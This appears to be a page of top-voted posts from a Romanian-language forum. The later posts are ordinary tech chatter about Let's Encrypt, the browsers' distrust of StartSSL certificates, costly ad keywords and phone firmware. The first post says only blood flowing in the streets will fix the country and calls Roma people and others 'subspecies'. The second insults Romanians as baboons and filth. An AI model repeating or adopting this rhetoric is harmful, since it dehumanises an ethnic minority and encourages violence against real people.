Nu rezolvi nimic prin asta. Va sfatuiesc sa nu recurgeti la chestii de genul. Singurul lucru care o sa rezolve ceva acolo este sangele. Sa curga mult pe strazi. Sunt granitele libere, orientati-va si plecati in alta parte unde munca este apreciata, unde exista protectie sociala, unde copii vostri nu vor creste intre tigani, manelari, ticalosi si alte subspecii. Feriti-va de romani, oriunde ati umbla in lume.1 point
-
Nu mai esti inconjurat de babuini melteni Dar te poti scapa de cetatenie si capata alta. Ce-i mai important, nu esti tratat ca unul (in functie de unde te duci si cum te comporti) Eh, daca e sa o dam in proverbe hai sa spunem si ca marul putred il strica si pe ala bun si ca spune-mi cu cine te imprietenesti ca sa-ti spun cine esti s.a.m.d. Lozinci inepte E vorba ca traiesti inconjurat de legi stupide, infrastructura proasta, tupeisti jegosi, cretinism mult, lenevie si parsivitate.1 point
-
Am patit si eu cand am ajuns la birou. Mi-am petrecut 2 minute sa instalez certificat de la Let's Encrypt, va recomand. E OK acum?1 point
-
All certs issued by startssl will stop working with major browsers Trustworthiness The StartSSL certificate is included by default in Mozilla Firefox 2.x and higher, in Apple Mac OS X since version 10.5 (Leopard), all Microsoft operating systems since 24 September 2009,[10][11] and Opera since 27 July 2010.[12] Since Google Chrome, Apple Safari and Internet Explorer use the certificate store of the operating system, all major browsers include support for StartSSL certificates. On 30 September 2016, during the investigation on WoSign, Apple announced that their software will not accept certificates issued by one of the WoSign certificates after 19 September 2016, and said they will take further action on WoSign/StartCom trust anchors as the investigation progresses.[5] On 24 October 2016, Mozilla announced on its security blog that, following its discovery of the purchase of StartCom by another Certificate Authority called WoSign during its investigation on numerous issues with that CA, and that both have failed to disclose this transaction,[13] Mozilla will stop trusting certificates that are issued after 21 October 2016 starting with Firefox 51.[14] On 1 November 2016, Google announced that it too would stop trusting certificates issued after 21 October 2016 starting with Chrome 56.[15] @Nytro, incearca sa iei legatura cu support@startssl.com1 point
-
Probabil se gaseste e okazii sau pe olx.1 point
-
Continutul site-ului si target-ul . Teoretic cam astea sunt top 10 platite ( doar statistici parerea mea ) , insa sunt mega-spamate si google stie. MESOTHELIOMA LAW FIRM ($ 179.01) Donate Car To Charity CALIFORNIA ($130.25) DONATE CAR FOR TAX CREDIT ($126.65) DONATE CARS IN MA ($125.58) DONATE YOUR CAR SACRAMENTO ($118.20) HOW TO DONATE A CAR IN CALIFORNIA ($111.21) SELL ANNUITY PAYMENT ($107.46) DONATE YOUR CAR FOR KIDS ($106.01) ASBESTOS LAWYERS ($105.84) CAR INSURANCE QUOTES COLORADO ($100.93)-1 points
-
salutare, pt cine intreaba de firm de evolio s4 cobalt , am eu raspunsul android-w507 cauta dupa seria asta sau iti spun exact unde il gasiti-1 points
-
-1 points
This leaderboard is set to Bucharest/GMT+02:00